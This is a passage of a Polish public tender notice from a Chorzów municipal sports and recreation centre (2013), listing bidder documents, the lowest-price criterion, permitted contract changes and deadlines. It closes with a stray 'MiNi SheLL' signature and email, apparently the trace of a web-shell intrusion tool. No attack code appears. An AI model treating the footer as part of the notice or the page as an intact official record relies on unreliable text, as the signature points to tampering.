Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takim przypadku Wykonawca zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.Dokumenty wymienione w Rozdziale V, VI winny być przedstawione w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
Zamawiający wykluczy Wykonawców, którzy nie złożą oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, z zastrzeżeniem postanowień         art. 26 ust. 3 ustawy Pzp. 
Zamawiający może wezwać na podstawie art. 26 ust. 4 ustawy Pzp, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń i dokumentów, o których mowa w art. 25 ust. 1 ustawy Pzp.
Wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 26 ust. 2d ustawy Pzp. jak również art. 4 pkt. 14 w rozumieniu ustawy z dnia 16 lutego 2007 r., o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, ze zm. ) , albo informację/oświadczenie o tym, że nie należy do grupy kapitałowej załącznik nr 2 do SIWZ. 
oświadczenia Wykonawcy o nie podleganiu wykluczeniu na postawie art. 24 ust 1  ustawy Pzp               ( załącznik nr 4 do siwz );

oświadczenia Wykonawcy, iż spełnia warunki udziału w postępowaniu określone w art. 22 ust.        1 pkt. 1 - 3 ustawy Pzp ( załącznik nr 5 do siwz).
Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ,
 Dokument zobowiązania podmiotu trzeciego potwierdzający dysponowaniem wiedzą i doświadczeniem, potencjałem technicznym, zdolnościach finansowych z którego wynikać będzie udział takiego podmiotu w wykonywaniu zamówienia (załączyć jeżeli dotyczy, jeżeli Wykonawca zamierza polegać na wiedzy, doświadczeniu, potencjale technicznym lub osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków podmiotu trzeciego). 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy (wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia, zdolności finansowej, innych podmiotów), a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający  żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w rozdz. VI pkt. A ust.1 pkt.1,2,3,5 
Dokument pełnomocnictwa do reprezentowania podmiotów występujących wspólnie (konsorcjum, spółka cywilna, itp.) w postępowaniu o udzielenie zamówienia (załączyć jeżeli dotyczy).
 Kopia dowodu wniesienia wadium.
Zał. nr 3 do SIWZ  podwykonawcy ( złożyć wtedy, kiedy dotyczy)
Zał. nr 8 do SIWZ- zaakceptowany wzór umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  Istotne postanowienia umowne zawiera wzór umowy- załącznik nr 8 do SIWZ, stanowiący integralną część niniejszej siwz.
2) Zamawiający - na podstawie art. 144 ust. 1 ustawy  Pzp - Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba ze zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu             o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
3) W szczególności zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
- konieczność zmiany osób uczestniczących w wykonaniu zamówienia;
- wystąpienie konieczności wykonania usług dodatkowych, od których zależy wykonanie przedmiotu zamówienia.
4) Dopuszczalny zakres zmian umowy w sprawie zamówienia publicznego obejmuje:
- możliwość przedłużenia bądź skrócenia terminu wykonania zamówienia i innych terminów    umownych;
- możliwość zmiany osób uczestniczących w wykonaniu zamówienia;
- możliwość zmiany umówionego wynagrodzenia wynikającego z porównania rozmiaru  i  wartości usług dodatkowych z usługami pierwotnie zamówionymi.
5) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych 
okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

6). Dopuszcza się wszelkie zmiany umowy:
- 	wywołane przyczynami zewnętrznymi, które w sposób obiektywny uzasadniają potrzebę tej 	zmiany, nie powodującą zachwiania równowagi ekonomicznej pomiędzy wykonawcą a 	zamawiającym,
- 	w zakresie zmniejszenia określonego wynagrodzenia Wykonawcy oraz zasad płatności tego 	wynagrodzenia w przypadku zmniejszenia zakresu Przedmiotu Umowy. 
7). Dopuszcza się wszelkie nieistotne zmiany w treści umowy, które to zmiany nie wpłynęłyby na krąg wykonawców ubiegających się o udzielenie zamówienia ani na wynik postępowania.
8) Zmiany wynagrodzenia brutto w przypadku zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.moris.chorzow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113,41-500 Chorzów pokój 335, za cenę 30,00 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2013 godzina 09:00, miejsce: Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113,41-500 Chorzów pokój 335,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com